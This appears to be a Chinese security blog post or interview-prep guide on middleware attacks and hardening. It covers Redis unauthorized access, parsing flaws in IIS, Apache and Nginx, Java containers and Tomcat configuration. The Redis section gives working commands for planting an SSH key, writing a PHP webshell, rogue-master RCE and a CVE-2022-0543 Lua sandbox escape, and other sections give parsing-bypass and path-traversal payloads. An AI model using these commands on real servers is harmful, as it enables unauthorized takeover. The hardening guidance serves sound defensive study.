网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
[1. 漏洞利用三板斧](#1. 漏洞利用三板斧)
[2. 新型攻击手法](#2. 新型攻击手法)
[3. 防御体系构建](#3. 防御体系构建)
[1. 经典解析漏洞矩阵](#1. 经典解析漏洞矩阵)
[2. 高级利用技巧](#2. 高级利用技巧)
[3. 防御方案](#3. 防御方案)
[1. 主流容器对比](#1. 主流容器对比)
[2. 新兴力量](#2. 新兴力量)
[1. 部署目录行为分析](#1. 部署目录行为分析)
[2. 防御实践](#2. 防御实践)
常见中间件
Redis未授权访问漏洞如何入侵利用? 说说常见的中间件解析漏洞利用方式 JAVA有哪些比较常见的中间件容器? tomcat要做哪些安全加固? 如果tomcat重启的话,webapps下,你删除的后台会不会又回来? 常见的网站服务器中间件容器。
一、Redis未授权访问漏洞攻防全解
1. 漏洞利用三板斧
SSH密钥植入
bash`redis-cli -h 10.2.3.4 flushall echo -e "\n\nssh-rsa AAAAB3NzaC1yc... user@kali" | redis-cli -x set crackit redis-cli config set dir /root/.ssh/ redis-cli config set dbfilename "authorized_keys" redis-cli save `
通过修改Redis持久化路径,将公钥写入目标服务器认证文件
Webshell写入
适用于Web目录已知场景:
bash`redis-cli config set dir /var/www/html/ redis-cli set shell "<?phpsystem($_GET['cmd']);?>" redis-cli config set dbfilename "webshell.php" redis-cli save `
主从复制RCE
利用模块化攻击框架:
bash`python3 redis-rogue-server.py --rhost 10.2.3.4 --lhost 192.168.1.5 `
通过恶意主节点发送module load指令加载.so扩展库实现命令执行
2. 新型攻击手法
CVE-2022-0543 Lua沙箱逃逸
利用Debian补丁漏洞执行任意命令:
lua`eval 'local io = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io(); local f = io.popen("id", "r"); local res = f:read("*a"); return res' 0 `
3. 防御体系构建
bash`# 修改redis.conf 关键配置 requirepass MyS3cr3tP@ss bind 127.0.0.1 ::1 rename-command FLUSHALL "" protected-mode yes `
二、中间件解析漏洞全景剖析
1. 经典解析漏洞矩阵
中间件 漏洞类型 利用示例 影响版本 IIS 6.0 目录解析漏洞 /test.asp/test.jpg Windows Server 2003 Apache 文件名解析特性 shell.php.rar 所有版本 Nginx %00截断 /test.jpg%00.php <0.8.37 PHP-CGI 参数解析漏洞 /test.jpg -s 192.168.1.5:4444 PHP<5.3.12 Tomcat 后缀绕过 /shell.jsp%20 7.x/8.x 2. 高级利用技巧
IIS短文件名爆破
使用工具扫描暴露的8.3格式短文件名:
bash`iis_shortname_scan.py -u http://target/`
Nginx配置错误
错误配置导致源码泄露:
nginx`location /static { alias /var/www/; }`
访问
/static../app/config.py
获取敏感文件WebLogic特殊后缀
http`GET /ws_utc/begin.do?.css HTTP/1.1 `
3. 防御方案
IIS加固
- 禁用ASP解析功能
- 配置请求过滤规则
Apache修复
apache`<FilesMatch "\.ph(p[3457]?|t|tml)$"> SetHandler application/x-httpd-php </FilesMatch>`
三、Java中间件生态全景
1. 主流容器对比
中间件 核心特性 常见漏洞 Tomcat Servlet/JSP容器 CVE-2017-12615(PUT上传) WebLogic 企业级J2EE应用服务器 CVE-2020-14882(未授权RCE) Jetty 轻量级嵌入式容器 CVE-2021-28169(路径遍历) JBoss/WildFly Java EE开源实现 CVE-2017-12149(反序列化) WebSphere IBM商业级解决方案 CVE-2020-4450(IIOP反序列化) 2. 新兴力量
- Undertow:Red Hat高性能非阻塞服务器
- Payara:GlassFish社区分支
- OpenLiberty:IBM轻量化微服务容器
四、Tomcat安全加固十二律
权限最小化
bash`useradd -M -s /sbin/nologin tomcat_user chown -R tomcat_user:tomcat_group /opt/tomcat/`
配置强化
xml`<!-- conf/server.xml --> <Connector port="8080" maxHttpHeaderSize="8192" server="Undisclosed" address="127.0.0.1"/>`
管理界面防护
xml`<!-- conf/tomcat-users.xml --> <role rolename="manager-script"/> <user username="deployer" password="Zxcv@1234!" roles="manager-script"/>`
协议升级
xml`<Connector SSLEnabled="true" sslProtocol="TLS" sslEnabledProtocols="TLSv1.2,TLSv1.3" ciphers="TLS_AES_256_GCM_SHA384,..."/>`
入侵检测配置
bash`# 部署Logstash监控日志 input { file { path => "/opt/tomcat/logs/*.log" start_position => "beginning" } }`
五、Tomcat持久化机制解密
1. 部署目录行为分析
热部署机制 :
webapps/
目录变更触发自动加载备份恢复场景 :
bash`# 典型目录结构 webapps/ ├── ROOT ├── app1.war ├── app1/ └── backup/ └── app1_20240411.bak `
2. 防御实践
彻底删除流程
bash`rm -rf webapps/app1/ # 删除解压目录 rm webapps/app1.war # 删除部署包 sed -i '/app1/d' conf/Catalina/localhost/*.xml # 清理配置文件 `
防止自动恢复
xml`<!-- conf/context.xml --> <Context antiResourceLocking="true" antiJARLocking="true"> <WatchedResource>WEB-INF/web.xml</WatchedResource> </Context>`
六、中间件安全演进趋势
- 云原生转型
- 容器化部署:Kubernetes Operator管理中间件
- Service Mesh:Istio实现安全流量管控
- 智能防护体系
- AI驱动的WAF:动态识别0day攻击
- RASP技术:实时阻断内存马注入
- 合规驱动
- 等保2.0三级要求
- GDPR数据安全规范
- 供应链安全
- SBOM(软件物料清单)管理
- 镜像签名验证
- 零信任架构
- SPIFFE身份认证
- 持续动态授权
深度防御建议
建立中间件资产清单
csv`IP地址,中间件类型,版本号,开放端口,负责人 10.1.2.3,Tomcat,9.0.64,8080,张三 10.1.2.4,WebLogic,12.2.1.4,7001,李四 `
自动化漏洞扫描
bash`# 使用Nexpose执行扫描 nexpose -s 10.1.2.0/24 -t middleware_scan `
红蓝对抗演练
mermaid`graph LR A[制定攻击方案] --> B[模拟入侵] B --> C[横向移动] C --> D[获取敏感数据] D --> E[编写防御手册]`
安全左移实践
bash`# 在CI/CD流水线集成安全检查 mvn verify -Dincludes=**/*.jsp -Dcheckstyle.config=security-check.xml `
本体系化解决方案覆盖中间件全生命周期安全管理,建议结合ATT&CK框架构建持续监控能力,通过自动化工具链实现安全能力闭环。